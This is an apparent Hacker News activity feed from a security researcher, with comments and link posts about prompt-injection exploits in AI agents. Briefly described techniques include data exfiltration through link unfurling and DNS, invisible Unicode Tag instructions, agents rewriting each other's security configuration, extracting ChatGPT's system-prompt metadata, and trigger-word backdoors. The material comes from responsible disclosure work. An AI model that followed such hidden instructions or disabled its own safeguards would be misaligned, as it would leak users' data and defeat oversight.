Hacker News: wunderwuzzi23

New comment by wunderwuzzi23 in "Data exfil from agents in messaging apps"

wunderwuzzi23 — Mon, 09 Feb 2026 23:33:50 +0000

Correct. Good to see this get more coverage.

Check out my research about unfurling in common messenger apps and also mitigations here:

https://embracethered.com/blog/posts/2023/ai-injections-thre...

And here "dangers of unfurling and what to do about it"

https://embracethered.com/blog/posts/2024/the-dangers-of-unf...

New comment by wunderwuzzi23 in "OpenAI API Logs: Unpatched data exfiltration"

wunderwuzzi23 — Thu, 22 Jan 2026 01:07:30 +0000

Agreed.

In December I reported a data exfil in OpenAI Agent Builder and it was also closed as Not Applicable, so it's probably still there.

It's also unclear if anyone from OpenAI even ever saw the report. I don't know.

Maybe the incentives are off on some bug bounty platforms or programs, and triagers are evaluated on how fast they respond, and how quickly a ticket is closed rather then what kind of quality tickets they help produce.

It's the only explanation I have for this kind of decisions.

New comment by wunderwuzzi23 in "First impressions of Claude Cowork"

wunderwuzzi23 — Fri, 16 Jan 2026 00:44:08 +0000

Claude (generally, even non Cowork mode) is vulnerable to exfil via their APIs, and Anthropic's response was that you should click the stop button if exfiltration occurs.

This is a good example of the Normalization of Deviance in AI by the way.

See my Claude Pirate research from last October for details:

https://embracethered.com/blog/posts/2025/claude-abusing-net...

New comment by wunderwuzzi23 in "Claude Cowork exfiltrates files"

wunderwuzzi23 — Wed, 14 Jan 2026 23:52:59 +0000

Relevant prior post, includes a response from Anthropic:

https://embracethered.com/blog/posts/2025/claude-abusing-net...

New comment by wunderwuzzi23 in "Fahrplan – 39C3"

wunderwuzzi23 — Fri, 26 Dec 2025 10:47:07 +0000

Excited! It's such a great event.

I'm currently on a plane towards Hamburg and will be speaking on Day 2.

"Agentic ProbLLMs - Exploiting AI Computer-Use and Coding Agents"

https://events.ccc.de/congress/2025/hub/event/detail/agentic...

New comment by wunderwuzzi23 in "COM Like a Bomb: Rust Outlook Add-in"

wunderwuzzi23 — Thu, 11 Dec 2025 03:31:08 +0000

In case some of you find it entertaining. When MCP came out I had a flashback to COM/DCOM days, like IDispatch and list/tools.

So, I built an MCP server that can host any COM server. :)

Now, AI can launch and work on Excel, Outlook and even resurrect Internet Explorer.

https://embracethered.com/blog/posts/2025/mcp-com-server-aut...

The Normalization of Deviance in AI

wunderwuzzi23 — Fri, 05 Dec 2025 23:10:33 +0000

Article URL: https://embracethered.com/blog/posts/2025/the-normalization-of-deviance-in-ai/

Comments URL: https://news.ycombinator.com/item?id=46168619

Points: 7

# Comments: 0

New comment by wunderwuzzi23 in "Google Antigravity exfiltrates data via indirect prompt injection attack"

wunderwuzzi23 — Tue, 25 Nov 2025 20:51:52 +0000

Cool stuff. Interestingly, I responsibly disclosed that same vulnerability to Google last week (even using the same domain bypass with webhook.site).

For other (publicly) known issues in Antigravity, including remote command execution, see my blog post from today:

https://embracethered.com/blog/posts/2025/security-keeps-goo...

New comment by wunderwuzzi23 in "Google Antigravity exfiltrates data via indirect prompt injection attack"

wunderwuzzi23 — Tue, 25 Nov 2025 20:41:09 +0000

It still is. plus there are many more issue. i documented some here: https://embracethered.com/blog/posts/2025/security-keeps-goo...

New comment by wunderwuzzi23 in "ChatGPT knows my IP geolocation"

wunderwuzzi23 — Sun, 09 Nov 2025 17:06:02 +0000

The system prompt contains a lot more information about you. Just ask it to print all information under User Interaction Metadata.

More details here: https://embracethered.com/blog/posts/2025/chatgpt-how-does-c...

New comment by wunderwuzzi23 in "New prompt injection papers: Agents rule of two and the attacker moves second"

wunderwuzzi23 — Mon, 03 Nov 2025 15:13:59 +0000

Good point. Few thoughts I would add from my perspective:

- The model is untrusted. Even if prompt injection is solved, we probably still would not be able to trust the model, because of possible backdoors or hallucinations. Anthropic recently showed that it takes only a few hundred documents to have trigger words trained into a model.

- Data Integrity. We also need to talk about data integrity and availability (full CIA triad, not not just confidentiality), e.g. private data being modified during inference. Which leads us to the third....

- Prompt injection which is aimed to have the AI produce output that makes humans take certain actions (not tool invocations)

Generally, I call the deviation from don't trust the model, the "Normalization of Deviance in AI" where seem to start trusting the model more and more over time - and I'm not sure if that is the right thing in the long term.

Claude will send your data to crims if they ask it nicely

wunderwuzzi23 — Sun, 02 Nov 2025 15:54:30 +0000

Article URL: https://www.theregister.com/2025/10/30/anthropics_claude_private_data/

Comments URL: https://news.ycombinator.com/item?id=45791215

Points: 10

# Comments: 0

New comment by wunderwuzzi23 in "First Self-Propagating Worm Using Invisible Code Hits OpenVSX and VS Code"

wunderwuzzi23 — Mon, 20 Oct 2025 22:10:12 +0000

It gets even worse with LLMs and agents.

Many LLMs can interpret invisible Unicode Tag characters as instructions and follow them (eg invisible comment or text in a GitHub issue).

I wrote about this a few times, here a recent example with Google Jules: https://embracethered.com/blog/posts/2025/google-jules-invis...

New comment by wunderwuzzi23 in "GitHub Copilot: Remote Code Execution via Prompt Injection (CVE-2025-53773)"

wunderwuzzi23 — Sun, 12 Oct 2025 17:59:40 +0000

Great point. It's actually possible for one agent to "help" another agent to run arbitrary code and vice versa.

I call it "Cross-Agent Privilege Escalation" and described in detail how such an attack might look like with Claude Code and GitHub Copilot (https://embracethered.com/blog/posts/2025/cross-agent-privil...).

Agents that can modify their own or other agents config and security settings is something to watch out for. It's becoming a common design weakness.

As more agents operate in same environment and on same data structures we will probably see more "accidents" but also possible exploits.

Cross-Agent Privilege Escalation: When Agents Free Each Other

wunderwuzzi23 — Mon, 06 Oct 2025 23:08:47 +0000

Article URL: https://embracethered.com/blog/posts/2025/cross-agent-privilege-escalation-agents-that-free-each-other/

Comments URL: https://news.ycombinator.com/item?id=45497324

Points: 2

# Comments: 0

New comment by wunderwuzzi23 in "From MCP to shell: MCP auth flaws enable RCE in Claude Code, Gemini CLI and more"

wunderwuzzi23 — Wed, 24 Sep 2025 08:27:50 +0000

Thanks for sharing! I'm actually the person the Ars Technica article references. :)

For recent examples check out my Month of AI bugs with of a focus on coding agents at https://embracethered.com/blog/posts/2025/wrapping-up-month-...

Lots of interesting new prompt injection exploits, from data exfil via DNS to remote code execution by having agents rewrite their own configuration settings.

New comment by wunderwuzzi23 in "Gemini in Chrome"

wunderwuzzi23 — Fri, 19 Sep 2025 16:03:27 +0000

Much longer actually, Bing Chat in Edge came out more than 2+ years ago.

New comment by wunderwuzzi23 in "Claude’s memory architecture is the opposite of ChatGPT’s"

wunderwuzzi23 — Thu, 11 Sep 2025 21:30:57 +0000

I wrote about how ChatGPT memory and also the chat history work a while ago.

Figured to share since it also includes prompts on how to dump the info yourself

https://embracethered.com/blog/posts/2025/chatgpt-how-does-c...

Month of AI Bugs 2025

wunderwuzzi23 — Wed, 03 Sep 2025 19:33:54 +0000

Article URL: https://monthofaibugs.com/

Comments URL: https://news.ycombinator.com/item?id=45119625

Points: 3

# Comments: 0

New comment by wunderwuzzi23 in "Comet AI browser can get prompt injected from any site, drain your bank account"

wunderwuzzi23 — Sun, 24 Aug 2025 19:45:03 +0000

About that find command...

Amazon Q Developer: Remote Code Execution with Prompt Injection

https://embracethered.com/blog/posts/2025/amazon-q-developer...